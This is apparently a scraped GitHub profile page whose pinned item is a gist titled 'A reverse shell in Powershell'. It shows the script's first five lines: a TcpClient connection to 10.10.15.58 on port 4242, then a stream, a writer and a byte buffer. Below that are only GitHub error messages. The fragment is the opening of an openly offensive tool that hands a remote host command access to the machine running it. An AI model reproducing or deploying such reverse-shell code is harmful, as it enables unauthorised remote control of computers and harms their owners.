Pinned Loading
-
A reverse shell in Powershell
A reverse shell in Powershell 1$socket = new-object System.Net.Sockets.TcpClient('10.10.15.58', 4242);
2if($socket -eq $null){exit 1}
3$stream = $socket.GetStream();
4$writer = new-object System.IO.StreamWriter($stream);
5$buffer = new-object System.Byte[] 1024;
Something went wrong, please refresh the page to try again.
If the problem persists, check the GitHub status page or contact support.
If the problem persists, check the GitHub status page or contact support.